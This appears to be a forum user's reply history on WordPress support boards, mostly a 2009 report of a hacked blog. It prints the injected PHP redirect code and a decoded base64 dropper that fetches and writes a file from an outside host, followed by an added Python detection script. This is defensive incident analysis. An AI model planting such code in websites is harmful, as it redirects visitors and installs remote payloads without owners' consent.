googol7
Forum Replies Created
Forum: Plugins
In reply to: Plug-in installation problems
Hi,
I got the error:
Incompatible Archive. PCLZIP_ERR_BAD_FORMAT (-10) : Invalid block size : 40
the problem was solved when I removed
mbstring.func_overload = "7"
from my PHP.INI and it works now!
Philipp
Forum: Fixing WordPress
In reply to: My blogs header has been hacked – how did they do it ?
hi,
was the plugin exec-php installed?
philipp
Forum: Fixing WordPress
In reply to: My blogs header has been hacked – how did they do it ?
hi,
same problem here. files affected:
/wp-content/themes/mytheme/404.php
-rwxr-x--- 1 myuser nobody 409 2009-11-17 11:14 404.php
New line at the top:
<script>location="<?php $code = file_get_contents("https://feed-statistics.com/domain.php?q=b8add2a5d9"); $code = str_replace("<domain>","", $code); $code = str_replace("</domain>", "", $code); echo $code; ?>?pid=317&sid=84dd6f";</script><?php get_header(); ?>
/wp-content/themes/mytheme/header.php
-rwxr-x--- 1 myuser nobody 1919 2009-11-18 21:33 header.php
New line at the top:
<script>location="<?php function getu($u, $p = array ()) { $c = @curl_init();if ($p) { @curl_setopt($c, CURLOPT_POST, 1); @curl_setopt($c, CURLOPT_POSTFIELDS, $p); } @curl_setopt($c, CURLOPT_URL, $u); @curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($c, CURLOPT_TIMEOUT, 30); $h = @curl_exec($c); @curl_close($c); return $h; } $code = getu("https://feed-statistics.com/domain.php?q=b8add2a5d9"); $code = str_replace("<domain>", "", $code); $code = str_replace("</domain>", "", $code); echo $code; ?>?pid=317&sid=84dd6f";</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
found malicious code in these files:
/wp-content/plugins/wp-cache.php
-rw-r----- 1 myuser nobody 4313 2009-10-08 05:56 wp-cache.php
/wp-content/wp-manager.php
-rw-r----- 1 myuser nobody 186780 2009-10-22 21:34 wp-manager.php
/wp-content/plugins/stats/wp-stats.php
had this content:
<?php eval(base64_decode('...')); ?>
which translates to:
if(!$_GET["p"]) { exit; } $host = str_replace("www.", "", $_SERVER["HTTP_HOST"]); $data=g874628347234("https://myweb-statistics.cn/fman/cache.php?new=1"); $fh = fopen("../../cache.php", "w"); fwrite($fh, $data); fclose ($fh); function g874628347234($u, $p = array()){ $c=curl_init(); curl_setopt($c, CURLOPT_URL, $u); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c, CURLOPT_TIMEOUT, 60); $h=curl_exec($c); curl_close ($c); return $h; }
philipp
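
Added example, not part of the original posts: a static triage helper in Python that flags the two patterns reported above (a script redirect prepended to a theme file, and an eval(base64_decode(...)) wrapper) and decodes the wrapped payload as text only, so its URLs and file writes can be reviewed without running any PHP. The function name, the sample strings and the example.invalid host are assumptions made for this illustration.

```python
import base64
import re

# Patterns taken from the post: an eval(base64_decode('...')) wrapper and a
# <script>location="<?php ... redirect inserted as the first line of a file.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)", re.I)
TOP_REDIRECT = re.compile(r"^\s*<script>\s*location\s*=\s*\"<\?php", re.I)
REMOTE_FETCH = re.compile(r"\b(file_get_contents|curl_init|curl_exec|fsockopen)\s*\(", re.I)
FILE_WRITE = re.compile(r"\b(fopen|fwrite|file_put_contents)\s*\(", re.I)
URL = re.compile(r"https?://[^\s\"')]+", re.I)


def triage_php(source: str) -> dict:
    """Statically inspect PHP source text; nothing is ever executed."""
    findings = {"top_redirect": bool(TOP_REDIRECT.match(source)),
                "eval_base64": False, "remote_fetch": False,
                "file_write": False, "urls": []}
    layers = [source]
    for match in EVAL_B64.finditer(source):
        findings["eval_base64"] = True
        try:  # decode the payload as text only, to see what it would do
            raw = base64.b64decode(match.group(1), validate=False)
            layers.append(raw.decode("utf-8", "replace"))
        except ValueError:
            pass  # malformed base64: keep the flag, skip the decode
    for layer in layers:  # check the file itself and every decoded layer
        findings["remote_fetch"] |= bool(REMOTE_FETCH.search(layer))
        findings["file_write"] |= bool(FILE_WRITE.search(layer))
        findings["urls"] += [u for u in URL.findall(layer)
                             if u not in findings["urls"]]
    return findings


# Constructed samples (not the payloads from the post); example.invalid is a
# placeholder host chosen for this illustration.
_INNER = ('$d = file_get_contents("http://example.invalid/c.php"); '
          '$fh = fopen("../../cache.php", "w"); fwrite($fh, $d);')
SAMPLE_DROPPER = ("<?php eval(base64_decode('%s')); ?>"
                  % base64.b64encode(_INNER.encode()).decode())
SAMPLE_HEADER = ('<script>location="<?php echo file_get_contents('
                 '"http://example.invalid/d.php"); ?>";</script><?php get_header(); ?>')
SAMPLE_CLEAN = "<?php get_header(); ?>\n<h1>Not found</h1>\n"

if __name__ == "__main__":
    for name in ("SAMPLE_DROPPER", "SAMPLE_HEADER", "SAMPLE_CLEAN"):
        print(name, triage_php(globals()[name]))
```

A file that is flagged for both a remote fetch and a file write inside a decoded layer matches the behaviour of the wp-stats.php content quoted above and is worth comparing against a clean copy of the plugin or theme.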